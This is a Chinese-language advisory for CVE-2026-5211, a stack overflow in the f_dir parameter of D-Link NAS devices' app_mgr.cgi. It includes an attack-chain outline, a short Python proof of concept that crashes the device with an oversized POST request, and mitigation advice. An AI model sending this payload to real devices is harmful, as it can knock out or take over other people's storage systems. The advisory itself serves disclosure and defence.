CVE-2026-5211 D-Link多款设备栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-5211

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04

漏洞概述

D-Link多款NAS设备（如DNS-120、DNS-320L等）在固件版本20260205之前存在严重的安全漏洞。该漏洞位于/cgi-bin/app_mgr.cgi文件的UPnP_AV_Server_Path_Del函数中，由于对f_dir参数缺乏严格的边界检查，导致栈缓冲区溢出。攻击者可利用此漏洞在无需用户交互的情况下远程执行任意代码，完全控制受影响设备，造成数据泄露或服务中断。

技术细节

该漏洞属于典型的栈缓冲区溢出漏洞。受影响的D-Link设备在处理用户请求时，通过/cgi-bin/app_mgr.cgi接口调用UPnP_AV_Server_Path_Del函数，该函数主要用于删除媒体服务器路径。在实现过程中，该函数直接将HTTP请求中的f_dir参数拷贝到栈上的固定大小缓冲区中，且未对输入长度进行有效验证。当攻击者发送超长的f_dir参数数据时，多余的数据会覆盖栈上的返回地址等关键寄存器信息。由于CVSS向量显示攻击复杂度低且无需用户交互，攻击者只需构造特制的HTTP POST请求发送至目标设备，即可触发溢出并劫持程序执行流，最终在目标系统上执行任意恶意代码，获取设备控制权。

攻击链分析

STEP 1

漏洞发现

攻击者扫描网络，识别出存在漏洞的D-Link NAS设备服务。

STEP 2

构造恶意数据

攻击者构造包含超长f_dir参数的HTTP POST请求，填充特定的溢出载荷。

STEP 3

发送攻击请求

将恶意请求发送至目标设备的/cgi-bin/app_mgr.cgi接口。

STEP 4

触发溢出与代码执行

目标设备处理请求时触发栈缓冲区溢出，覆盖返回地址，跳转执行攻击者植入的Shellcode，获取系统权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/cgi-bin/app_mgr.cgi"
    # Payload pattern to trigger stack overflow
    # Adjust length based on specific offset analysis
    payload = b"A" * 600 + b"BBBB" # Example Crash Pattern
    
    data = {
        "action": "UPnP_AV_Server_Path_Del",
        "f_dir": payload
    }
    
    try:
        print(f"Sending exploit payload to {url}...")
        response = requests.post(url, data=data, timeout=5)
        print(f"Response status: {response.status_code}")
        # Check for crash or specific behavior indicators
    except requests.exceptions.RequestException as e:
        print(f"Request failed (device may have crashed): {e}")

if __name__ == "__main__":
    target = "192.168.1.1" # Replace with actual target IP
    exploit(target)

影响范围

D-Link DNS-120 (Firmware <= 20260205)

D-Link DNR-202L (Firmware <= 20260205)

D-Link DNS-315L (Firmware <= 20260205)

D-Link DNS-320 (Firmware <= 20260205)

D-Link DNS-320L (Firmware <= 20260205)

D-Link DNS-320LW (Firmware <= 20260205)

D-Link DNS-321 (Firmware <= 20260205)

D-Link DNR-322L (Firmware <= 20260205)

D-Link DNS-323 (Firmware <= 20260205)

D-Link DNS-325 (Firmware <= 20260205)

D-Link DNS-326 (Firmware <= 20260205)

D-Link DNS-327L (Firmware <= 20260205)

D-Link DNR-326 (Firmware <= 20260205)

D-Link DNS-340L (Firmware <= 20260205)

D-Link DNS-343 (Firmware <= 20260205)

D-Link DNS-345 (Firmware <= 20260205)

D-Link DNS-726-4 (Firmware <= 20260205)

D-Link DNS-1100-4 (Firmware <= 20260205)

D-Link DNS-1200-05 (Firmware <= 20260205)

D-Link DNS-1550-04 (Firmware <= 20260205)

防御指南

临时缓解措施

如果无法立即升级固件，建议暂时禁用设备的远程管理功能和UPnP服务，并在网络边界防火墙上阻断对外部对设备Web服务端口（通常为80/443）的访问请求，以降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5211
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5211
3 Details https://www.cvedetails.com/cve/CVE-2026-5211/
4 VulDB https://vuldb.com/cve/CVE-2026-5211
5 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_165/165.md
6 Link https://vuldb.com/submit/780434
7 Link https://vuldb.com/vuln/354347
8 Link https://vuldb.com/vuln/354347/cti
9 Link https://www.dlink.com/